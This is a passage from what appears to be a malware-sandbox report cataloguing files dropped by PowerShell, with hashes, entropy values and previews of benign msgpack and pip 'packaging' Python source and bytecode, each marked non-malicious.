                                                                                                                                                                                                                              Entropy (8bit):4.464413013178071
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+8MBh/8J+JcOLHDs/eghjP966Zhrk+IMrOuCyIZNY6Ky1FrkO:+nVJdLjs/z966Pk+IIb0xKg
                                                                                                                                                                                                                              MD5:5B76079BB7F940958293D2BC20D20EF6
                                                                                                                                                                                                                              SHA1:56DD1193CD4CA44D617EFED82E1C7E0E798C350F
                                                                                                                                                                                                                              SHA-256:0B930AF0985560660558FBF1B0E46CA99027BCE5DE7D8439EE6D589B496E5B93
                                                                                                                                                                                                                              SHA-512:8074511E86FCB3826A67F2EDE04A437DA7D7E99F70F8C2B68B35C46C4BDDCAD73F792744791336BF4C891B712053594457CF5AA4B091BC025FE038C4A94388D2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# coding: utf-8.from collections import namedtuple.import datetime.import sys.import struct...PY2 = sys.version_info[0] == 2..if PY2:. int_types = (int, long). _utc = None.else:. int_types = int. try:. _utc = datetime.timezone.utc. except AttributeError:. _utc = datetime.timezone(datetime.timedelta(0))...class ExtType(namedtuple("ExtType", "code data")):. """ExtType represents ext type in msgpack.""".. def __new__(cls, code, data):. if not isinstance(code, int):. raise TypeError("code must be int"). if not isinstance(data, bytes):. raise TypeError("data must be bytes"). if not 0 <= code <= 127:. raise ValueError("code must be 0~127"). return super(ExtType, cls).__new__(cls, code, data)...class Timestamp(object):. """Timestamp represents the Timestamp extension type in msgpack... When built with Cython, msgpack uses C methods to pack and unpack `Timestamp`. When using pure-Python. ms
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):34544
                                                                                                                                                                                                                              Entropy (8bit):4.491363854064074
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:4ch4KEom2MV2UwXmQj8Bi3ew9jUQyWLYCjxL1hRJ:4ebEom2+hwpABi9jUQyWLYCjxL1hr
                                                                                                                                                                                                                              MD5:3A2ED7C2B238C0EB01CE42D54B420B82
                                                                                                                                                                                                                              SHA1:54AEE9FBC1FD6F29C3ACAA5716B085E0C0540D32
                                                                                                                                                                                                                              SHA-256:B6F3411F2C7115BB95942F066528444C2949C632E20CC3A36B85F0C32BCD9B68
                                                                                                                                                                                                                              SHA-512:6CC4DBEC2E856B87337BE209BAB545A0296DC705B872C9FDF530B4286BAC309C0EA32178156CE287FC5B905481E2B5C400C4400061E70546FD165EA8C895C21F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Fallback pure Python implementation of msgpack""".from datetime import datetime as _DateTime.import sys.import struct...PY2 = sys.version_info[0] == 2.if PY2:. int_types = (int, long).. def dict_iteritems(d):. return d.iteritems()..else:. int_types = int. unicode = str. xrange = range.. def dict_iteritems(d):. return d.items()...if sys.version_info < (3, 5):. # Ugly hack.... RecursionError = RuntimeError.. def _is_recursionerror(e):. return (. len(e.args) == 1. and isinstance(e.args[0], str). and e.args[0].startswith("maximum recursion depth exceeded"). )..else:.. def _is_recursionerror(e):. return True...if hasattr(sys, "pypy_version_info"):. # StringIO is slow on PyPy, StringIO is faster. However: PyPy's own. # StringBuilder is fastest.. from __pypy__ import newlist_hint.. try:. from __pypy__.builders import BytesBuilder as StringBuilder. except ImportError:.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):661
                                                                                                                                                                                                                              Entropy (8bit):4.7638108446875265
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:qD+6O0vgEVhO17kMRnHt4oJDTFvqvUHC3u/5G/E4ZqQ9590/NDe2UHVjuEF/mBcd:q9O0opwMFNz14MHqwhQ950iDR/mBclY6
                                                                                                                                                                                                                              MD5:68D5FC8A7DDB919BB241078B4E4DB9CC
                                                                                                                                                                                                                              SHA1:65369F014EA304064474D47C719401803C999ED8
                                                                                                                                                                                                                              SHA-256:BA001220EDB0D685321FCFC23AA4365FFB34AC38636E1402DF2268703D378767
                                                                                                                                                                                                                              SHA-512:BA9E26DF6282C298BC52F7B1F3B47648118DCB65EAFF1CBF0FB17007A39F46787596295E54A097E674AF2565C024FB49A1E39A6E44BDFCEB20295060B96F2C1F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...__all__ = [. "__title__",. "__summary__",. "__uri__",. "__version__",. "__author__",. "__email__",. "__license__",. "__copyright__",.]..__title__ = "packaging".__summary__ = "Core utilities for Python packages".__uri__ = "https://github.com/pypa/packaging"..__version__ = "21.3"..__author__ = "Donald Stufft and individual contributors".__email__ = "donald@stufft.io"..__license__ = "BSD-2-Clause or Apache-2.0".__copyright__ = "2014-2019 %s" % __author__.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):497
                                                                                                                                                                                                                              Entropy (8bit):4.312188833585291
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:qD+6O0vgEVhO17ysSfiJEgF4MNnRnHt4oJDTFvqvUHC3u/D:q9O0opD3JFNFNz14MHqK
                                                                                                                                                                                                                              MD5:B85796F8D9D4E7556C6AD5EC9F0C5371
                                                                                                                                                                                                                              SHA1:9501323E7783213AB6C7C8E8FD05CD95D7A76BA1
                                                                                                                                                                                                                              SHA-256:6FD2A4E4C17B2B18612E07039A2516BA437E2DAB561713DD36E8348E83E11D29
                                                                                                                                                                                                                              SHA-512:EB02053D616708ED5C51DA204E1DAE2072BB2263E1466024E3BC363A35CEFFBA509794AEC153E6A36CF49474CD73E4F63F3E2DAA34D6D18DE83FBFB055321263
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from .__about__ import (. __author__,. __copyright__,. __email__,. __license__,. __summary__,. __title__,. __uri__,. __version__,.)..__all__ = [. "__title__",. "__summary__",. "__uri__",. "__version__",. "__author__",. "__email__",. "__license__",. "__copyright__",.].
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):613
                                                                                                                                                                                                                              Entropy (8bit):5.683024689214111
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:Q04e4URA73WU2qQ95CG0/r9uBcvNzUGP2OsUP8KNnaVYFaAkkK8q6y01V:QNeHS7lQ95QuBcH2OAKNnH0AkkRq6yC
                                                                                                                                                                                                                              MD5:2DE5B638BB377B56DC0D5186E45E3552
                                                                                                                                                                                                                              SHA1:3ACACAEE93F081FBAFE7F5D03D8DFD4F60FAF787
                                                                                                                                                                                                                              SHA-256:07420B68B7A873E513268ACBCADB84E3BBDA3B7E57BEF9DCBA92FA8396A466D7
                                                                                                                                                                                                                              SHA-512:FBC469361D061AE63F0F6F58F061911EDBF67F8B67038587BC6EBE5EFDC380BA4BF8C9BB8C5E6FABF629F39BDFAC2DA65950AE14A259D6F86F83BEF1A26D4FD8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................2.....g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.e.z...Z.y.).)...__title__..__summary__..__uri__..__version__..__author__..__email__..__license__..__copyright__..packagingz"Core utilities for Python packagesz!https://github.com/pypa/packagingz.21.3z)Donald Stufft and individual contributorsz.donald@stufft.ioz.BSD-2-Clause or Apache-2.0z.2014-2019 %sN)...__all__r....r....r....r....r....r....r....r............PC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/packaging/__about__.py..<module>r........s;........................2....-.........8.........*.........+..r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):449
                                                                                                                                                                                                                              Entropy (8bit):4.918193346997776
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:fhMj73W64uKsXjZ7Os2RnLKNnaVQcjad+tIswj1:ZMj7HFK2jFObZKNnPbdD1
                                                                                                                                                                                                                              MD5:B9F06D9ABE1615E6999B5A6FBC84D9A2
                                                                                                                                                                                                                              SHA1:244610C61CAD46CA528FB1CE11CB3D595EB6F9E7
                                                                                                                                                                                                                              SHA-256:52D58BEF9864226EFBD0C23680850E2B6F1CBB2B9B671A28CF526B1F19A4068C
                                                                                                                                                                                                                              SHA-512:8FE124D2E506B63FC5AC72E5AC8D9E9244C381B418FCD711F24A723CE3E5E249AD4E2FE5078E7A54CDF59DF67EFE993AEE90A7A84D39478312A67DEBB2418225
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................4.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...g.d...Z.y.)......)...__author__..__copyright__..__email__..__license__..__summary__..__title__..__uri__..__version__).r....r....r....r....r....r....r....r....N)...__about__r....r....r....r....r....r....r....r......__all__........OC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/packaging/__init__.py..<module>r........s...............................r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12059
                                                                                                                                                                                                                              Entropy (8bit):5.370987712125692
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:5r4QM2pL4CBDlEqqfYVSFmf6ajq/zl+ghFZpRdJYeC7kjhBEZEkY4:5Mr2R4CBPqQVkU6amblNrpRdpCcBUY4
                                                                                                                                                                                                                              MD5:5D50FF1CDFEBE560C8358A3FA919E1F9
                                                                                                                                                                                                                              SHA1:6202657A4CD34F41DE0A95846524D8CA64613F0D
                                                                                                                                                                                                                              SHA-256:320DA21471C7DC81C81D9D1A976CFE923FC0043912D1331A91741F258B155FF1
                                                                                                                                                                                                                              SHA-512:2287EA597BE56E3D8DFCE38F8EFD3B3EB071AAE728ADCFFE20D79859032357A678424748398F4E2B10312A9C8F8E86A5649C7FDF864C13629A310991FA5F24C3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.,..............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....G.d...d.........Z.d.e.e.....f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.d.e.f.d...Z...e.j*..................d...........Z.e.e.e.f.....e.d.<.....G.d...d.e.........Z.d.e.e.....f.d...Z.d.e.e.....f.d...Z.d.e.e.....f.d...Z.d.e.d.e.e.e.f.....f.d...Z...e.j<..........................d.e.e.e.f.....f.d...........Z.d.e.d.e.d.e.d.e.f.d...Z d.d.d.d...Z!d.e.d.e.d.e.e.....f.d...Z"y.)......N)...IO..Dict..Iterator..NamedTuple..Optional..Tuplec.....................h.....e.Z.d.Z...G.d...d.e.........Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.e.e.....d.d.f.d...Z.y.)..._ELFFileHeaderc...........................e.Z.d.Z.d.Z.y.)..$_ELFFileHeader._InvalidELFFileHeaderz7. An invalid ELF file header was found.. N)...__name__..__module__..__qualname__..__doc__........QC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/packaging/_manylinux.py.._InvalidELFFileH
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6893
                                                                                                                                                                                                                              Entropy (8bit):5.586393858685329
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:IeOVdyKga1ura17K0FJSWPmcIzoqiMLYMMHQAapJqYYA3vtFI+qj:rO3n1VJJ2cIzRMdaDiA3vtFI+m
                                                                                                                                                                                                                              MD5:D7962E794FEE6308A704B0D0D6BCC699
                                                                                                                                                                                                                              SHA1:79E28BDC3287434E4234C753AD5CD7A3E475BC76
                                                                                                                                                                                                                              SHA-256:C8A5C8E152CA33BEF82B55B73250EFDEE3B08AB219F607ED17288C10480EA15D
                                                                                                                                                                                                                              SHA-512:74F59A1916AC2B16E545BCC26B49BEDA7CF7076AF81CAF788A3943C3B25FC3182E4FAC912E2EF06E2B8965EB5567A7F7CBFA834E13FDB89BDA1DEF421602E310
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................Z.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.e.e.....d.e.d.e.e.d.f.....f.d...Z.d.e.e.....d.e.e.....f.d...Z...G.d...d.e.........Z.d.e.d.e.e.....f.d...Z...e.j,..........................d.e.d.e.e.....f.d...........Z.d.e.d.e.e.....f.d...Z.e.d.k(..r.d.d.l.Z...e.j6..........................Z.e.j;..................d.........s.J.d.............e.d.e.............e.d...e.e.j>......................................e.d.d...............e...e.j@..................d.d.e.jC..................d.d.........d.....................D.]...Z"..e.e"d.................y.y.) z.PEP 656 support...This module implements logic to detect if the currently running Python is.linked against musl, and what musl version is used.......N)...IO..Iterator..NamedTuple..Optional..Tuple..f..fmt..return.c.....................r.....t.........j...................|.|.j...................t.........j...................|.........................S.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3224
                                                                                                                                                                                                                              Entropy (8bit):4.6425049227371655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:ADTzwJe0ryvAWeRhbZDavnQ4bzwI/XFXlpj/4kE8P+XceYF6:OTueMnejL/1X4kAXcf6
                                                                                                                                                                                                                              MD5:DD85845D9F8C6E977534B9F9BB51396B
                                                                                                                                                                                                                              SHA1:AA105553415CD8CAEA34A0B791373AE09247FE27
                                                                                                                                                                                                                              SHA-256:709058F355252F0E270CE3237A3436712BA9DABFF98CBD03543D07DA9F7C9846
                                                                                                                                                                                                                              SHA-512:6D9F22F191729F3E7304CABF2E26D3900F399B1F35742ED09F7F43B1BA4CCA610789BF2EDCB33BA41DF564212234BE2A7679AF73722DFC6C6146D8D1B227989B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................H.......G.d...d.........Z...e.........Z...G.d...d.........Z...e.........Z.y.).c..........................e.Z.d.Z.d.e.f.d...Z.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.d.f.d...Z.y.)...InfinityType..returnc...........................y.).N..Infinity......selfs.... .RC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/packaging/_structures.py..__repr__z.InfinityType.__repr__....s..............c.....................*.....t.........t.........|.................S...N....hash..reprr....s.... r......__hash__z.InfinityType.__hash__...............D...J......r......otherc...........................y...NFr......r....r....s.... r......__lt__z.InfinityType.__lt__..............r....c...........................y.r....r....r....s.... r......__le__z.InfinityType.__le__....r....r....c...........................t.........|.|.j...........................S.r........isinstance..__class__r....s.... r......__e
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14041
                                                                                                                                                                                                                              Entropy (8bit):5.191358769825523
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:cZE5VrqTpeg/PBfefZ8LD3IDYrQhI3cZusQJSm5r:B5VSd3BfefZ8LDYDYrhcZusQJ55r
                                                                                                                                                                                                                              MD5:D4611C5F79DF60A6CB28A700ACC28BD0
                                                                                                                                                                                                                              SHA1:704A6EA887840779B5C19FE38A84386AA7E28040
                                                                                                                                                                                                                              SHA-256:CCA1965A311E76D40041C85FE74D69AE568EEB2E06397FC3A70E43ED3F5D810B
                                                                                                                                                                                                                              SHA-512:20D520278DECBA1EC0E6CDBCA9B2C4D65DB60870CF0335CFEFC9686193A3DF175BF6B8A59A122C1A31BB9295E7BA19A44D121EDA800049B59415BD87A0645DAC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf'!.............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...g.d...Z.e.e.e.g.e.f.....Z...G.d...d.e.........Z...G.d...d.e.........Z ..G.d...d.e.........Z!..G.d...d.........Z"..G.d...d.e"........Z#..G.d...d.e"........Z$..G.d...d.e"........Z%..e.d...........e.d.........z.....e.d.........z.....e.d.........z.....e.d.........z.....e.d.........z.....e.d.........z.....e.d.........z.....e.d.........z.....e.d.........z.....e.d.........z.....e.d ........z.....e.d!........z.....e.d"........z.....e.d#........z.....e.d$........z.....e.d%........z.....e.d&........z...Z&d.d.d.d.d.d.d'..Z'e&jQ..................d(..............e.d)..........e.d*........z.....e.d+........z.....e.d,........z.....e.d-........z.....e.d.........z.....e.d/........z.....e.d0........z...Z)e)..e.d1........z.....e.d2........z...Z*e*jQ..................d3..............e.d4..........e.d5........z...Z+e+jQ................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6929
                                                                                                                                                                                                                              Entropy (8bit):5.294825961522292
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+KL2x5sy0gzZlXKPOx5bmWHzc/suiyHfavGBCcLz5CWKgB10zbhgQ:5n4KPOx5bmwitHivqhDzYqQ
                                                                                                                                                                                                                              MD5:303947ED68AB8DCEC027159AA6401603
                                                                                                                                                                                                                              SHA1:17EE8EF5807A8E5E6CDF24EB5F09730F46C9C224
                                                                                                                                                                                                                              SHA-256:0BC3401527A34A5FEF57ACA728541029F04AEE50A209B76E5BB74AFA49C5667B
                                                                                                                                                                                                                              SHA-512:6BABF3F5388ED1981FC2918727E11C59755FCD75CD7EE38ACF42CA9E7CFF40FF93D1A199A1FDE18E618BD21019CA88C6B3898D64CD1E2CB8CA17D4026AFE0E95
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfD.........................8.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.....G.d...d.e.........Z...e.e.j:..................e.j<..................z...........Z...e.d.........jA..........................Z!..e.d.........jA..........................Z"..e.d.........jA..........................Z#..e.d.........jA..........................Z$..e.d.........jA..........................Z%..e.d.........jA..........................Z&..e.d.........jA..........................Z'..e.d.........Z(e...e.e(........e.z...z...Z)..e.e...e.e)........z...........Z*..e*d.........Z+e*Z,....e.d.........d.........Z-e'e-z...Z.e,..e.e%e,z...........z...Z/..e!..e.e/........z...e"z...d.........Z0..e.e.jb..................e.jd..................e.jf..................z...........Z4..e.e.jb..................e.jd..................e.jf..................z...........Z5e4e5z...Z6....e.e6..e.e%e6z...........z...d.d...........d.......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):31230
                                                                                                                                                                                                                              Entropy (8bit):5.22261908874568
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:8VjK9IebdEo9YE3hhvApRuhdwhOuhLHyrskvR0Hv8IKFzrKiu:8VjSo2+K6iu
                                                                                                                                                                                                                              MD5:CE9E5D428CE05AF07C9BFCA620CE7DCE
                                                                                                                                                                                                                              SHA1:5B8FDF7941559F500033F8B0BD3CB7792A60B6CD
                                                                                                                                                                                                                              SHA-256:5147867E64A67C9426790A9596D93CD99B42F9B7325B29D23136138149CD8FE3
                                                                                                                                                                                                                              SHA-512:1A3D5DE8527840722DA65CAF40C16AC481A70B2E82991B5F779E30A1EF80485BAD53EBCDF0E2FF7CB12CE419768DD14A3742EDFFDC6062823906ED1F70784E26
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.u..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...e.e.e.f.....Z.e.e.e.e.f.....Z...e.d.e...........Z.e.e.e.g.e.f.....Z...G.d...d.e.........Z...G.d...d.e.j>............................Z ..G.d...d.e ........Z!..G.d...d.e!........Z"d.e.d.e.e.g.e.f.....d.e.d.e.e.g.e.f.....f.d...Z#..G.d...d.e!........Z$..e.jJ..................d.........Z&d.e.d.e.e.....f.d...Z'd.e.d.e.f.d...Z(d.e.e.....d.e.e.....d.e.e.e.....e.e.....f.....f.d...Z)..G.d...d.e ........Z*y.) .....N)...Callable..Dict..Iterable..Iterator..List..Optional..Pattern..Set..Tuple..TypeVar..Union.....)...canonicalize_version)...LegacyVersion..Version..parse..VersionTypeVar)...boundc...........................e.Z.d.Z.d.Z.y.)...InvalidSpecifierzH. An invalid specifier was found, users should refer to PEP 440.. N)...__name__..__module__..__qualname__..__doc__........QC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_ve
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18939
                                                                                                                                                                                                                              Entropy (8bit):5.55009890118628
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:bpSTB4AAyVlg2tfD+SGxk35hgZ6KYOZwVlyaEJN/pLbYqadPk:bpS4AAyXg8LzGxOcZLNZwzyBtdbYqwPk
                                                                                                                                                                                                                              MD5:BBCECC6CE2C191305FE6DFCD631ED0E8
                                                                                                                                                                                                                              SHA1:8B62C2FCF747760161157BF4F1608886B5CF5488
                                                                                                                                                                                                                              SHA-256:E554C2477DD1649C7B663A861876B9623D815F3C6A0603AF4C3C700431168440
                                                                                                                                                                                                                              SHA-512:5824CEFB89A252F8BA9A135E58722F09C27BB80BC31704157C3B90646AA4A8136A1B079869A4F78B86FEF3A110E833AF7C8B19DC7F578794CFF57BB02CB221C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfS=........................b.....U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j(..................e.........Z.e.e.....Z.e.e.e.f.....Z.d.d.d.d.d.d...Z.e.e.e.f.....e.d.<...e.j:..................d.k...Z...G.d...d.........Z.d.e.d.e.e.....f.d...Z d4d.e.d.e!d.e.e.e.d.f.....f.d...Z"d.e.d.e.f.d...Z#d.e.d.e!f.d...Z$d4d.e.d.e!d.e.e.....f.d...Z%......d5d.d...d.e.e.....d.e.e.e.........d.e.e.e.........d.e!d.e.e.....f.d ..Z&d.e.e.....f.d!..Z'......d5d.d...d"e.e.....d.e.e.e.........d.e.e.e.........d.e!d.e.e.....f.d#..Z(d.e.d.e.e.....f.d$..Z)......d5d.e.e.....d"e.e.....d.e.e.e.........d.e.e.....f.d%..Z*e.f.d&e.d'e!d.e.f.d(..Z+d)e.d*e.d.e.e.....f.d+..Z,..d6d)e.e.....d&e.e.....d.e.e.....f.d,..Z-e.f.d'e!d.e.e.....f.d-..Z.d.e.e.....f.d...Z/d.e.e.....f.d/..Z0d.e.f.d0..Z1d.d...d.e!d.e.f.d1..Z2d)e.d.e.f.d2..Z3d.d...d.e!d.e.e.....f.d3..Z4y.)7.....N)...EXTENSION_SUFFIXES)...Dict..FrozenSet..Iterable..Iterator..List..Optional..Seque
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5851
                                                                                                                                                                                                                              Entropy (8bit):5.375491298508688
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:R5QALa3ZLE1yySBZ2M+3n8r6MudYZv6FUihYnAlSF+cQtUt:R5ja3BiyySBZ2T8uMuh1XSQc+Ut
                                                                                                                                                                                                                              MD5:F1BAF12984A2D92A709EEA58AC3AF54F
                                                                                                                                                                                                                              SHA1:EB6C8F02DE57C14F5C0AE0DE9F13C3A37FF04289
                                                                                                                                                                                                                              SHA-256:5187F24126791FE036F7A4FDD58F92CA9557A7D270AA42E8090861017AF0FBF6
                                                                                                                                                                                                                              SHA-512:FB3898E43672747E252DE523B557378E11CA2E9D7F8AA6F19161084696D8C21D1F82850D810357779886910519834569F876CF1D363CAD25C31B2A007A1BC2D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfh.........................T.....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...e.e.d.....e.e.e.f.....f.....Z...e.d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...e.j(..................d.........Z...e.j(..................d.........Z.d.e.d.e.f.d...Z.d.e.e.e.f.....d.e.f.d...Z.d.e.d.e.e.e.e.e.e.....f.....f.d...Z.d.e.d.e.e.e.f.....f.d...Z.y.)......N)...FrozenSet..NewType..Tuple..Union..cast.....)...Tag..parse_tag)...InvalidVersion..Version....NormalizedNamec...........................e.Z.d.Z.d.Z.y.)...InvalidWheelFilenamezM. An invalid wheel filename was found, users should refer to PEP 427.. N....__name__..__module__..__qualname__..__doc__r..........LC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/packaging/utils.pyr....r....................r....r....c...........................e.Z.d.Z.d.Z.y.)...InvalidSdistFilenamez^. An invalid sdist filename was found, users should refer to the packaging user guide.. Nr....r....r....r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):19922
                                                                                                                                                                                                                              Entropy (8bit):5.062582195783126
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:lJhTSae0NoFIXOdW/8OvEYj7ni4aC3Rc/iap2ozQHbR7:PM0OuEOvEYj7i7CBvtR7
                                                                                                                                                                                                                              MD5:BB198D55D9200F87837378725C7CA224
                                                                                                                                                                                                                              SHA1:8DA54C5B855F12FD24BB5701A9BF3C2E76701328
                                                                                                                                                                                                                              SHA-256:880431F71CDBBB2B87E1110F639E9656DFEF2DDF02D4FF3E468660A5F49FBD49
                                                                                                                                                                                                                              SHA-512:63D1E2894CCDDA9210E3C272654D9C1C9C9B3543891D81ECB50A4AC45A46EBD270D6261BA8E74F93917F8E631E96506E7D606CD3F54B27A034E9ECCE73878A52
                                                                                                                                                                                                                              Malicious:false
